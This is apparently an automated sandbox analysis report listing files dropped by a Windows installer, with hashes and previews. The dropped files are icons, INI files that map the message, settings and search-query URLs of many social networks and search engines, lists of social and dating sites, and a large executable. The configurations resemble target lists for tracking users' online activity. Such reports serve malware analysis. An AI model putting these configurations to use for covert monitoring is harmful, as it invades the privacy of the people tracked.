                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):409
                                                                                                                                                                                                                                                          Entropy (8bit):7.015430309226083
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/ntuuZyeN46QM3TNzORtgDjrSNNXH:j1yA47QRORtgXuL
                                                                                                                                                                                                                                                          MD5:45409D06153FF84BDB5AB3E30C7CAB12
                                                                                                                                                                                                                                                          SHA1:AB84313D7A29E9D9C6308E3B99CB247AAADE34C4
                                                                                                                                                                                                                                                          SHA-256:52611BFC775199483CF8216F2FAEC18FD56B9D895A1173338B36BE5F14F5FC06
                                                                                                                                                                                                                                                          SHA-512:7C21E74A7787B1F26F0A5A4ADC4B4D469C069F6A066E4AE45D72F5515696313BAEC74C9435E04B812521339918E08E2136EBAA81E4351053AF9D372BB372F377
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O.S...0....fH&........3S.......f0s.}......Z...5...-,aM^zw.{}m.*.2..x...2.YC....$..u......*....9I..-...(.R wf.G..0....>+...lr..f../R*q.q.3.......4M.`..q.c.....$6M..1&.K.F{.6....U=I..?...M.h1dFQd.`.#...zew..\.EAA......v...$...\.$.S.....K.W.b.d...w.....R.F......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):307
                                                                                                                                                                                                                                                          Entropy (8bit):6.610384624893472
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tepODZkidAJRzwBtNpQ+YiMpOhbi9eo77Vp:6v/78/nffTBvpQRiombi9j7
                                                                                                                                                                                                                                                          MD5:06CE05DA1418C5F5B952911492F1D313
                                                                                                                                                                                                                                                          SHA1:17A0D4EBD1E5A5BD338ECCAEF1CA9944EEC7C156
                                                                                                                                                                                                                                                          SHA-256:380154EAE1DE86B8AA27433A0044FBB471A0C067E14DD8DD740F6419A06F0EFB
                                                                                                                                                                                                                                                          SHA-512:3735BF636D31B885B429EA1C70CCC3850666A801C53B40F5570EF584D6180486E22A06DB31757987DDC5EDBB209CBF2790A8DB2566C8962107519CEC75F7A871
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.p.i.....da.^.....>..Az..x{{...g..^ ..7...a....@.c.............>0...5.W.X...;......765.....b]........... .06..`~.?........0Y..{......_......,..Kqf....l9pA}....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 15 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):304
                                                                                                                                                                                                                                                          Entropy (8bit):6.615232112735145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhP8LMR/C+wZA3te4YeOiG/WrSUAHmrOk3I9/t6CEyO9hbp:6v/7V/nw5WGUAHmrJ3Wl3Ol
                                                                                                                                                                                                                                                          MD5:7710D6BF6295D39378CE75797D7509B5
                                                                                                                                                                                                                                                          SHA1:090E061712842B2611BDDF21DE8FDC016DE827AB
                                                                                                                                                                                                                                                          SHA-256:3A098E07391825DB6349455DAF4215AE19C52A55B6838F7539FC1D439F5988A0
                                                                                                                                                                                                                                                          SHA-512:725B1F1292B10C80FAF1B3F9799A8833866829687A798037FEA2477F8E567E077FD2868B1B177D74B7C8C86F501C8E9706733D600774BECB53141BD136C98F5B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............V%.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.``........@..:;..A........w...'..5W...'....h.a...Pw0..lb 9..0..q.."..Z.~.9..C.....31....Dk.16..g....b.>.`#..;W.....A.1H=H.C....Pc...b.>. ..b)2........+4F....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                          Entropy (8bit):6.666726809754627
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teHAFYqNQHvot6aM1nqJyVlMt+OxMp:6v/78/noAF2vonMDHs+Ox+
                                                                                                                                                                                                                                                          MD5:7D35A55137029755B25CA2B25F54D7AE
                                                                                                                                                                                                                                                          SHA1:22C1FA56B55C250889EB7B2AECE02803F34E4D43
                                                                                                                                                                                                                                                          SHA-256:07256C3BA7DF49D4258054B35AFD01555CC25BD32D19DA852F1077C5B298A8CD
                                                                                                                                                                                                                                                          SHA-512:2FFE767C9FCE4BC994460E7071579B6DF94A650FF9E3F9CC0538D599CD40178304302583C826F9CF39BAD2F160433E264BD2265DB17D016FA60158EF34461D0A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`..L.........@...K.....?..O....Y.e...m./...7.....A. .Y-V.@.a......I6...p. C@|.!X].jZ... ........n....A|......l...)|py5..77...X.....p.a....^@.@........x.@Jz...$..^......7.23.....y..?..k.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [News]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):859
                                                                                                                                                                                                                                                          Entropy (8bit):4.858296034006616
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:Ty3COfcKd063/4Ga1rmWCdmr1gm+amVyxpgmkmAEnnmmImC4dmEnq:+kKGQiC5Enrq
                                                                                                                                                                                                                                                          MD5:4A6A1B208E79D27168441977D43897FC
                                                                                                                                                                                                                                                          SHA1:FAE08C5EF8DB510F634E46623AB09C63EA9C3F8A
                                                                                                                                                                                                                                                          SHA-256:F2B9D0C45FA2A9B15BB9694C26BD75B45B4E011B99D80604D2984C0F856B2AD9
                                                                                                                                                                                                                                                          SHA-512:79E43D69F7973750B534BDE680380BC912B906F3D3D848255BA3F8ADE4DC7FAD460CD0FF14230AEAED4285F291D6510AF57FA1F9876ABEFDE1F6D56890B35D03
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Welcome]..ID="facebook.com/?sk=welcome"..[News]..ID="facebook.com/?sk=nf"..[Messages]..ID="facebook.com/messages"..[Events]..ID="facebook.com/events"..[Find friends]..ID="facebook.com/find-friends/browser"..[Invite friends]..ID="facebook.com/?sk=ff"..[Friends]..ID="facebook.com/lists"..[Friends List]..ID="/friends?ft_ref=flsa"..[Groups]..ID="facebook.com/bookmarks/groups"..[Settings]..ID="facebook.com/settings?tab=account"..[Security]..ID="facebook.com/settings?tab=security"..[Notifications]..ID="facebook.com/settings?tab=notifications"..[Subscribers]..ID="facebook.com/settings?tab=subscribers"..[Apps]..ID="facebook.com/settings?tab=applications"..[Payments]..ID="facebook.com/settings?tab=payments"..[Facebook Ads]..ID="facebook.com/settings?tab=ads"..[Gifts]..ID="facebook.com/settings?tab=gifts"..[Privacy]..ID="facebook.com/settings/?tab=privacy"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Friends]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                                                                          Entropy (8bit):4.685024049706956
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:QRUXdrx9reugHovdMTaW4/d1amqKL946WImgK4/d1amqKLrjM+n:KOdrDeaMB4FQ7l9NgK4/dQ7r+n
                                                                                                                                                                                                                                                          MD5:CFA4D0ED34E826F2A6A243ADCE69C272
                                                                                                                                                                                                                                                          SHA1:F4C7EA1EFC0FD6A61706120C4BF66452418805EC
                                                                                                                                                                                                                                                          SHA-256:9202BF8E81E98F492F5610A2F67E6CF8882890484F0F8E7B43EE9DA2D2372B70
                                                                                                                                                                                                                                                          SHA-512:66663614DCBBC9E62E91A2B34B1518AD3EB7C78C39F8DA9523F1D17A7CBC3000EAC7F7373A698BF9F76A3B395EB857393225E4E77216EBEE06C83CF0D871FF88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Messages]..ID="vk.com/im"..[Friends]..ID="vk.com/friends"..[Notifications]..ID="vk.com/feed?section=notifications"..[Replies]..ID="vk.com/feed?section=replies"..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Marks]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):159
                                                                                                                                                                                                                                                          Entropy (8bit):4.674458029739085
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:91A2vTzyosXO/ovsh2vJ5Im5B9gHovNRN4o6bHiys6SIFv9oc:91A2vT+vm/h2v8ARNmi/6S+v9oc
                                                                                                                                                                                                                                                          MD5:6BD299C4CBF0029EA3F2F85BE0268693
                                                                                                                                                                                                                                                          SHA1:D45F93594FEEA321B778C691051CE9B47D13D480
                                                                                                                                                                                                                                                          SHA-256:BB9DBEEE227D18FFB6BE8AE4C33D681CC8A04FF1120F69EBF73E98E4302C6051
                                                                                                                                                                                                                                                          SHA-512:7EEDA815F4D91D0B588DA4B0F3EFB222CA189A8E42333B1664EC9520FD1BA68EF80ABC9F4B965CD5657A0334B8AED2C412DC79CEEF9EC34867CC429A51C1E95E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Guests]..ID="ok.ru/guests"..[Marks]..ID="ok.ru/marks"..[Friends]..ID="/friends"..[Photos]..ID="/photos"..[About]..ID="/about"..[Profiles]..ID="ok.ru/profile/"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Instagram]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2361
                                                                                                                                                                                                                                                          Entropy (8bit):5.086790461308817
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:lkYaqeR/Mfg1mg6kL33dMLoXL2MK7hWNPE0hx8wgOV+U3DkROxPDv:ukgEEx6O+m+YPFYyJ
                                                                                                                                                                                                                                                          MD5:C846DA6EDAA3DA7B84D7C275232E7113
                                                                                                                                                                                                                                                          SHA1:48EFA8A9F71BA06A8AEF67786F234CCFF43EBFF1
                                                                                                                                                                                                                                                          SHA-256:4AAEB9FA982ADED9CE384AFDD72AD2D9F25F4D4803D29936D86F3836F71ED323
                                                                                                                                                                                                                                                          SHA-512:69259712A33EEAAAB99503C95E8F5F5614ECBD300065EED89181A26DFF15621F69D7B995212EBD6062A739C0A05B0BFED11E5B367AE91A6D80895519F75CA455
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Facebook]..ID="facebook.com"..NodeID=31..msgID="facebook.com/messages"..SearchID="facebook.com/search/results.php"..QueryID="?q="..LoginOk="facebook.com/?sk=welcome"..[Instagram]..ID="instagram.com"..NodeID=68..msgID=""..SearchID=""..QueryID=""..LoginOk=""..[Youtube]..ID="youtube.com"..NodeID=69..msgID=""..SearchID="youtube.com/results?search_query"..QueryID="?search_query"..LoginOk=""..[Twitter]..ID="twitter.com"..NodeID=33..msgID="twitter.com"..SearchID="twitter.com/i/#!/search"..QueryID="#!/search/"..LoginOk=""..[LinkedIn]..ID="linkedin.com"..NodeID=35..msgID="linkedin.com/msgToConns"..SearchID="linkedin.com/search"..QueryID="keywords="..LoginOk="linkedin.com/home"..[Myspace]..ID="myspace.com"..NodeID=32..msgID="http://www.myspace.com/my/mail"..SearchID="http://www.myspace.com/search/"..QueryID="?q="..LoginOk="myspace.com/home"..[VKontakte]..ID="vk.com"..NodeID=36..msgID="vk.com/im"..SearchID="http://vk.com/search"..QueryID="[q]="..LoginOk="vk.com/id"..[Odnoklassniki]..ID="ok.ru"..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                          Entropy (8bit):4.314915181326778
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:LqRlJbXyi6AA:2lBrA
                                                                                                                                                                                                                                                          MD5:D584582812D6A2E882BE885DD27E18E5
                                                                                                                                                                                                                                                          SHA1:388346E2897C7849D8F7E38A2450377023503257
                                                                                                                                                                                                                                                          SHA-256:63B34D170783C35985AB770AA19CE31E5AC8C90899423BE3A587B1CF17D417B8
                                                                                                                                                                                                                                                          SHA-512:C057ED6B8AD5DB53BD6D4FC556E03F3D6607D06A35D4FE91BD16B39E2DC9822FC7F1C740BA89297D31F645047B7941DE1501115ED2159180BC41B4B37C9F1D83
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:Facebook..Instagram..Youtube..Twitter..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):4.327066369049407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:K26WLRAXXRlJ6AA:b6WL2XBldA
                                                                                                                                                                                                                                                          MD5:CE9D18D694ABDCAC70A411D4D97C0231
                                                                                                                                                                                                                                                          SHA1:F12E3CBE15AF7D09B9733E08C8CA2A7B8B934DBA
                                                                                                                                                                                                                                                          SHA-256:BBF1063DC08DB46AA6A44034E46B917D3F0A7F95668854565EBE8DFE2B0CD7C1
                                                                                                                                                                                                                                                          SHA-512:245E456B408CE7E7428F96C293E0FBABE1FFF54B0A877EFE9DE18F49B0D52CE5A361E250FF8122EE07EE7CE276D56DCB5865339CA69545034726699C6315A7FE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:VKontakte..Odnoklassniki..Facebook..Instagram..Youtube..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):4.327066369049407
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:K26WLRAXXRlJ6AA:b6WL2XBldA
                                                                                                                                                                                                                                                          MD5:CE9D18D694ABDCAC70A411D4D97C0231
                                                                                                                                                                                                                                                          SHA1:F12E3CBE15AF7D09B9733E08C8CA2A7B8B934DBA
                                                                                                                                                                                                                                                          SHA-256:BBF1063DC08DB46AA6A44034E46B917D3F0A7F95668854565EBE8DFE2B0CD7C1
                                                                                                                                                                                                                                                          SHA-512:245E456B408CE7E7428F96C293E0FBABE1FFF54B0A877EFE9DE18F49B0D52CE5A361E250FF8122EE07EE7CE276D56DCB5865339CA69545034726699C6315A7FE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:VKontakte..Odnoklassniki..Facebook..Instagram..Youtube..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46
                                                                                                                                                                                                                                                          Entropy (8bit):4.289760053836067
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:GAwEHRlJ6AA:rldA
                                                                                                                                                                                                                                                          MD5:A93742C5D8E593F07A5A9951CC0C9B8F
                                                                                                                                                                                                                                                          SHA1:775714482966FE1FED5185AC0C73A6D44255AB29
                                                                                                                                                                                                                                                          SHA-256:A15CF44B89919588E0C5D703E83C6E2D4E74C4F47D76EEB3CFB8CB6AD9821A5E
                                                                                                                                                                                                                                                          SHA-512:C4899FB5BA32AE6D60D2AB9D0BEF08D05C0B9789969FDD4C015CA9B07B655183F2C70565EEED9A76FC915DCF80149961CBAFF7240F059331A7A872897E5BBEF3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:QQZone..Facebook..Instagram..Youtube..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46
                                                                                                                                                                                                                                                          Entropy (8bit):4.289760053836067
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:GAwEHRlJ6AA:rldA
                                                                                                                                                                                                                                                          MD5:A93742C5D8E593F07A5A9951CC0C9B8F
                                                                                                                                                                                                                                                          SHA1:775714482966FE1FED5185AC0C73A6D44255AB29
                                                                                                                                                                                                                                                          SHA-256:A15CF44B89919588E0C5D703E83C6E2D4E74C4F47D76EEB3CFB8CB6AD9821A5E
                                                                                                                                                                                                                                                          SHA-512:C4899FB5BA32AE6D60D2AB9D0BEF08D05C0B9789969FDD4C015CA9B07B655183F2C70565EEED9A76FC915DCF80149961CBAFF7240F059331A7A872897E5BBEF3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:QQZone..Facebook..Instagram..Youtube..LinkedIn
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Bing]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):403
                                                                                                                                                                                                                                                          Entropy (8bit):4.907393652480167
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:q7HkVMKScEhBLLPWKBFHxpZ8FEh6XQcU0socpvIEyyJFnHn:q7EmuEhBHTDS+Ifcph15Hn
                                                                                                                                                                                                                                                          MD5:B53F62F901D117D87C4F2C1C68D8E092
                                                                                                                                                                                                                                                          SHA1:9DC2741DF0AB9D2B8E3D533E980E6DF71FD371ED
                                                                                                                                                                                                                                                          SHA-256:62A43DD8AE4C377B91DB18E5CA4DFD7FDBA2834FF4AF36F76AD2AA4BD8715650
                                                                                                                                                                                                                                                          SHA-512:22DA0AA723324DF15FEC0231A7CB791541CA5F844E51E55DBFC3654E5D56F943B837E4098613E804BD9729AD1B630937336D9EDBC8259FC34EC5C7783ACC290C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Google]..ID="google."..QueryID="q="..[Bing]..ID="www.bing.com"..QueryID="search?q="..[Yahoo]..ID="search.yahoo.com"..QueryID="p="..[AOL]..ID="search.aol.com"..QueryID="&q="..[Yandex]..ID="yandex.ru/"..QueryID="text="..[MAIL.RU]..ID="go.mail.ru/"..QueryID="q="..[Rambler]..ID=".rambler.ru/"..QueryID="?query="..[Twitter]..ID="twitter.com/i/#!/search"..QueryID="?q="..[Baidu]..ID=".baidu."..QueryID="wd="
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Generic INItialization configuration [Bing]
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):403
                                                                                                                                                                                                                                                          Entropy (8bit):4.907393652480167
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:q7HkVMKScEhBLLPWKBFHxpZ8FEh6XQcU0socpvIEyyJFnHn:q7EmuEhBHTDS+Ifcph15Hn
                                                                                                                                                                                                                                                          MD5:B53F62F901D117D87C4F2C1C68D8E092
                                                                                                                                                                                                                                                          SHA1:9DC2741DF0AB9D2B8E3D533E980E6DF71FD371ED
                                                                                                                                                                                                                                                          SHA-256:62A43DD8AE4C377B91DB18E5CA4DFD7FDBA2834FF4AF36F76AD2AA4BD8715650
                                                                                                                                                                                                                                                          SHA-512:22DA0AA723324DF15FEC0231A7CB791541CA5F844E51E55DBFC3654E5D56F943B837E4098613E804BD9729AD1B630937336D9EDBC8259FC34EC5C7783ACC290C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[Google]..ID="google."..QueryID="q="..[Bing]..ID="www.bing.com"..QueryID="search?q="..[Yahoo]..ID="search.yahoo.com"..QueryID="p="..[AOL]..ID="search.aol.com"..QueryID="&q="..[Yandex]..ID="yandex.ru/"..QueryID="text="..[MAIL.RU]..ID="go.mail.ru/"..QueryID="q="..[Rambler]..ID=".rambler.ru/"..QueryID="?query="..[Twitter]..ID="twitter.com/i/#!/search"..QueryID="?q="..[Baidu]..ID=".baidu."..QueryID="wd="
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12672
                                                                                                                                                                                                                                                          Entropy (8bit):4.945624942122352
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:PEOFXvauPDJG6oOmEvV8OOdc4QlyjzOsXY7g0jCsSbC2FRSnK:8OhvXFG6oORVzf4Wy3YjkbCORSnK
                                                                                                                                                                                                                                                          MD5:EAB386B915F70A4A1F89FE9FF6869FE9
                                                                                                                                                                                                                                                          SHA1:C4FAAEC24E3A335D855347DFABDA65D667FF45AB
                                                                                                                                                                                                                                                          SHA-256:A0BB8DA59EA887B970CAB6DDACB14D3982A04D40FB40C391E7C043E0B48C940C
                                                                                                                                                                                                                                                          SHA-512:FBF63960ADE19D872597158E99DE499C7DC080E64E2B7F921D8A3BB96A0A77018C8DC0B0DD9E8B8213F06BD6B5F5279DBC5180DC39A1A64D55A3F503B17B307B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[Social Networks]..0=facebook.com..1=myspace.com..2=tiwitter.com..3=linkedin.com..4=bebo.com..5=friendster.com..6=hi5.com..7=habbo.com..8=ning.com..9=classmates.com..10=tagged.com..11=myyearbook.com..12=meetup.com..13=mylife.com..14=fixter.com..15=myheritage.com..16=multiply.com..17=orkut.com..18=badoo.com..19=gaiaonline.com..20=blackplanet.com..21=skyrock.com..22=perfspot.com..23=zorpia.com..24=tuenti.com..25=nk.pl..26=irc-galleria.net..27=studivz.net..28=xing.com..29=renren.com..30=kaixin001.com..31=hyves.nl..32=millatfacebook.com..33=ibibo.com..34=sonico.com..35=wer-kennt-wen.de..36=nate.com..37=mixi.jp..38=iwiw.hu..39=plus.google.com..40=vk.com..41=odnoklassniki.ru..42=pinterest.com..43=livejournal.com..44=meetup.com..45=blogspot.com..46=tumblr.com..47=instagram.com..48=blogger.com....[Dating Sites]..0=match.com..1=plentyoffish.com..2=zoosk.com..3=eharmony.com..4=singlesnet.com..5=okcupid.com..6=true.com..7=christianmingle.com..8=cupid.com..9=datehookup.com..10=chemistry.com..11
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (4429), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12672
                                                                                                                                                                                                                                                          Entropy (8bit):4.945624942122352
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:PEOFXvauPDJG6oOmEvV8OOdc4QlyjzOsXY7g0jCsSbC2FRSnK:8OhvXFG6oORVzf4Wy3YjkbCORSnK
                                                                                                                                                                                                                                                          MD5:EAB386B915F70A4A1F89FE9FF6869FE9
                                                                                                                                                                                                                                                          SHA1:C4FAAEC24E3A335D855347DFABDA65D667FF45AB
                                                                                                                                                                                                                                                          SHA-256:A0BB8DA59EA887B970CAB6DDACB14D3982A04D40FB40C391E7C043E0B48C940C
                                                                                                                                                                                                                                                          SHA-512:FBF63960ADE19D872597158E99DE499C7DC080E64E2B7F921D8A3BB96A0A77018C8DC0B0DD9E8B8213F06BD6B5F5279DBC5180DC39A1A64D55A3F503B17B307B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[Social Networks]..0=facebook.com..1=myspace.com..2=tiwitter.com..3=linkedin.com..4=bebo.com..5=friendster.com..6=hi5.com..7=habbo.com..8=ning.com..9=classmates.com..10=tagged.com..11=myyearbook.com..12=meetup.com..13=mylife.com..14=fixter.com..15=myheritage.com..16=multiply.com..17=orkut.com..18=badoo.com..19=gaiaonline.com..20=blackplanet.com..21=skyrock.com..22=perfspot.com..23=zorpia.com..24=tuenti.com..25=nk.pl..26=irc-galleria.net..27=studivz.net..28=xing.com..29=renren.com..30=kaixin001.com..31=hyves.nl..32=millatfacebook.com..33=ibibo.com..34=sonico.com..35=wer-kennt-wen.de..36=nate.com..37=mixi.jp..38=iwiw.hu..39=plus.google.com..40=vk.com..41=odnoklassniki.ru..42=pinterest.com..43=livejournal.com..44=meetup.com..45=blogspot.com..46=tumblr.com..47=instagram.com..48=blogger.com....[Dating Sites]..0=match.com..1=plentyoffish.com..2=zoosk.com..3=eharmony.com..4=singlesnet.com..5=okcupid.com..6=true.com..7=christianmingle.com..8=cupid.com..9=datehookup.com..10=chemistry.com..11
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38533120
                                                                                                                                                                                                                                                          Entropy (8bit):6.659117982180381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:393216:lw4FxslQp+QsIjKvL/RouclpOaPdvmtzzGnDHmgRBbxr5U0zvOaHxA2KZc4P9QpC:lw4fslOPKVouExr5U0zGaHxAJkuC+d7
                                                                                                                                                                                                                                                          MD5:63C6697F6F8C4DE12A18633A65A6DD50
                                                                                                                                                                                                                                                          SHA1:442715CE26B000A34E25DBE9BED05863C2488096
